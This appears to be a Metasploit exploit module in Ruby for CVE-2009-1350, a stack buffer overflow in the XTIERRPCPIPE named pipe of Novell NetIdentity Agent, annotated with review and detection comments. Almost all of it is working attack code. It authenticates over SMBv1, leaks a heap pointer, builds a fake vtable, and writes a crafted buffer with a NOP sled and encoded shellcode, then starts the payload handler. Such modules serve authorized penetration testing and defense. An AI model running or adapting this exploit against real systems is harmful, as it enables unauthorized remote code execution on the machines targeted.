Path: blob/master/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2009-1350 (Novell NetIdentity Agent, '\XTIERRPCPIPE'
# named pipe). Everything here happens inside an *authenticated* SMBv1 session:
# the module logs in with SMBUser/SMBPass, opens the named pipe, and does so on
# two separate connections (#mem_leak first, then #exploit). The sequence that is
# observable on the wire / in SMB audit logs is therefore: an SMB logon with the
# configured credentials, a Trans2 request (subcommand 0x0007) carrying the
# pipe's file id, and a roughly 2 KB write to \XTIERRPCPIPE — repeated over a
# second connection.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::SMB::Client

  # Module metadata and options. Points worth knowing before running or hunting
  # for this module (all taken from the values below):
  # - SMBUser/SMBPass default to 'metasploit'/'metasploit' and fall back to the
  #   global USERNAME/PASSWORD options; valid credentials are a precondition,
  #   this is not an unauthenticated exploit.
  # - 'SMB::ProtocolVersion' is deregistered because both #mem_leak and
  #   #exploit call `connect(versions: [1])`, so the module is SMBv1-only.
  # - EXITFUNC defaults to 'process' ("only one shot!"), and the description
  #   states success is more likely after the service has been restarted.
  # - The target's 'Ret' => 0x41414141 is a placeholder: no code in this file
  #   reads target['Ret']; the addresses used are derived at run time in
  #   #mem_leak.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow',
      'Description' => %q{
          This module exploits a stack buffer overflow in Novell's NetIdentity Agent. When sending
        a specially crafted string to the 'XTIERRPCPIPE' named pipe, an attacker may be
        able to execute arbitrary code. The success of this module is much greater once the
        service has been restarted.
      },
      'Author' => [ 'MC', 'Ruben Santamarta' ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2009-1350' ],
          [ 'OSVDB', '53351' ],
          [ 'BID', '34400' ],
          [ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=62&Itemid=1' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process', # only one shot!
        },
      'Payload' =>
        {
          'Space' => 550,
          'BadChars' => "\x00\x09\x0c\x0b\x20\x0a\x0d\x5c\x5f\x2f\x2e\x40",
          'StackAdjustment' => -3500,
          'PrependEncoder' => "\x81\xe4\xf0\xff\xff\xff",
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [ 'Windows 2000 / Windows XP / Windows 2003', { 'Ret' => 0x41414141 } ],
        ],
      'Privileged' => true,
      'DisclosureDate' => '2009-04-06',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('SMBUser', [ true, 'The username to authenticate as', 'metasploit'], fallbacks: ['USERNAME']),
        OptString.new('SMBPass', [ true, 'The password for the specified username', 'metasploit'], fallbacks: ['PASSWORD'])
      ])

    deregister_options('SMB::ProtocolVersion')
  end

  # don't bother with this module for autoexploitation, it creates
  # false-positives on newer systems.
  #
  # Returning false opts this module out of automatic exploitation runs.
  def autofilter
    false
  end

  # First connection: opens an SMBv1 session and the named pipe, sends one
  # 2048-byte request (two fixed 32-bit LE words followed by 2040 random
  # upper-case letters) and reads the reply. Four bytes at offset 2060 of the
  # reply are unpacked as a little-endian 32-bit value; three further values are
  # derived from it by fixed offsets (+0x700, then +0x30, then +0xA0) and all
  # four are printed to the module output.
  #
  # Returns [heap_pointer_leaked, object, method, shellcode], or nil (bare
  # `return`) when smb_login or create_pipe raises. Only the pipe is closed on
  # the success path; the SMB session itself is not disconnected here.
  #
  # NOTE(review): if the reply is shorter than 2064 bytes, `pipe.read()[2060,4]`
  # is nil or truncated and `.unpack`/`sprintf` raise instead of returning nil,
  # so `disconnect` is never reached on that path (unlike the two rescued
  # failures above it).
  # NOTE(review): `rescue ::Exception` also traps Interrupt and SystemExit;
  # `rescue StandardError` would be the narrower, conventional choice.
  # NOTE(review): the "Authenticating ..." line echoes SMBPass in clear text to
  # the module output and any console log.
  def mem_leak
    print_status("Connecting to the server...")
    # SMBv1 is pinned here and in #exploit (hence the deregistered option).
    connect(versions: [1])

    print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")

    begin
      smb_login()
    rescue ::Exception => e
      print_error("Error: #{e}")
      disconnect
      return
    end

    print_status("Connecting to named pipe \\XTIERRPCPIPE...")

    # If the pipe doesn't exist, bail.
    begin
      pipe = simple.create_pipe('\\XTIERRPCPIPE')
    rescue ::Exception => e
      print_error("Error: #{e}")
      disconnect
      return
    end

    # If we get this far, do the dance.
    fid = pipe.file_id

    # Need to make a Trans2 request with the param of 'QUERY_FILE_INFO' keeping our file_id
    # (the return value is not used; `trans2` is assigned but never read).
    trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')

    # Send the first request to get our pointer.
    leak = [0x00000004].pack('V') + [0x00000818].pack('V')
    leak << rand_text_alpha_upper(2040)

    print_status("Sending malformed request...")
    pipe.write(leak)

    # Reads the whole reply and takes bytes 2060..2063 as a 32-bit LE value.
    heap_pointer_leaked = pipe.read()[2060,4].unpack('V')[0]
    print_status(sprintf("Heap Pointer leaked: 0x%.8x", heap_pointer_leaked))

    print_status("Building fake VTable...")
    object = heap_pointer_leaked + 0x700
    print_status(sprintf("Object: 0x%.8x", object))
    method = object + 0x30
    print_status(sprintf("Method: 0x%.8x", method))
    shellcode = method + 0xA0
    print_status(sprintf("Shellcode: 0x%.8x", shellcode))

    pipe.close

    return heap_pointer_leaked,object,method,shellcode
  end

  # Second connection: calls #mem_leak, aborts if it returned nil, assembles
  # the request buffer from the four returned values, then opens a fresh SMBv1
  # session to the same pipe, writes the buffer and hands over to the payload
  # handler before disconnecting.
  #
  # Layout of `sploit`, with sizes as written below: four 32-bit LE words
  # (2, 0, object, 0), 240 random letters, three 128-byte runs of a repeated
  # address (object, method, shellcode — 32 copies each), 748 NOP bytes, the
  # encoded payload (bounded by 'Space' => 550 and the BadChars list) and 110
  # trailing random letters — 1498 bytes plus the payload. The byte count is
  # printed just before the write.
  #
  # NOTE(review): the session opened by #mem_leak was never disconnected
  # before `connect` is called again here; only its pipe was closed.
  # NOTE(review): the `trans2` local is assigned but never read, as in
  # #mem_leak; and the same `rescue ::Exception` / clear-text password notes
  # from #mem_leak apply to the duplicated login and pipe-open code below.
  def exploit
    heap_pointer_leaked,object,method,shellcode = mem_leak()

    # mem_leak returns nil on login/pipe failure, which makes every local nil.
    return if not shellcode

    sploit = [0x00000002].pack('V')
    sploit << [0x00000000].pack('V')
    sploit << [object].pack('V')
    sploit << [0x00000000].pack('V')
    sploit << rand_text_alpha_upper(240)
    sploit << [object].pack('V') * 32
    sploit << [method].pack('V') * 32
    sploit << [shellcode].pack('V') * 32
    sploit << make_nops(748)
    sploit << payload.encoded
    sploit << rand_text_alpha_upper(110)

    print_status("Connecting to the server...")
    connect(versions: [1])

    print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")

    begin
      smb_login()
    rescue ::Exception => e
      print_error("Error: #{e}")
      disconnect
      return
    end

    print_status("Connecting to named pipe \\XTIERRPCPIPE...")

    # If the pipe doesn't exist, bail.
    begin
      pipe = simple.create_pipe('\\XTIERRPCPIPE')
    rescue ::Exception => e
      print_error("Error: #{e}")
      disconnect
      return
    end

    # ok, set up and send our exploit buffer...
    fid = pipe.file_id
    # Same Trans2 call as in #mem_leak; return value unused.
    trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')
    print_status("#{sploit.length} bytes written...")
    pipe.write(sploit)

    # Start the payload handler, then tear down the SMB session.
    handler
    disconnect
  end
end